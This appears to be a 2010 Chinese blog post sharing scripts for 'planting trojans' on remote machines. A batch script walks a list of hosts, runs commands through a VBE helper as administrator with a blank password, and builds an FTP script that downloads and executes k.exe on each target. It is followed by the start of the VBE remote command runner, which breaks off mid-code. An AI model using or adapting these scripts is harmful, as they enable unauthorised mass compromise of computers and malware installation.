标题:Bat代码的传马脚本 出处:大漠荒颜 时间:Fri, 24 Dec 2010 20:15:34 +0000 作者:北纬36度 地址:http://www.736202.com/read.php/531.htm 内容: 很简单的自己看代码 Bat代码的传马脚本 @ECHO OFF&SETLOCAL ENABLEDELAYEDEXPANSION :start SET A=1 FOR /F "TOKENS=1* DELIMS=:" %%A IN ('FINDSTR /N .* host.txt') DO ( call start cscript rpmd.vbe %%B administrator "" "cmd /c @echo open IP地址>>net.dat&@echo 123>>net.dat&@echo 123>>net.dat&@echo get k.exe>>net.dat&@echo bye>>net.dat&@ftp -s:net.dat&del net.dat&k.exe&k.exe&del k.exe) VBE代码的传马脚本 on error resume Next if (lcase(right(wscript.fullname,11))="wscript.exe") then set objShell=wscript.createObject("wscript.shell") objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) wscript.quit end If function usage() wscript.echo "" wscript.echo " 远程调用Cmd执行DOS命令" wscript.echo " Http://www.736202.com" wscript.echo "" wscript.echo "" wscript.echo "_____________________________________________________________________________" wscript.echo "用法:" wscript.echo "cscript "&wscript.scriptname&" " wscript.echo "_____________________________________________________________________________" end Function if wscript.arguments.count Generated by Bo-blog 2.1.1 Release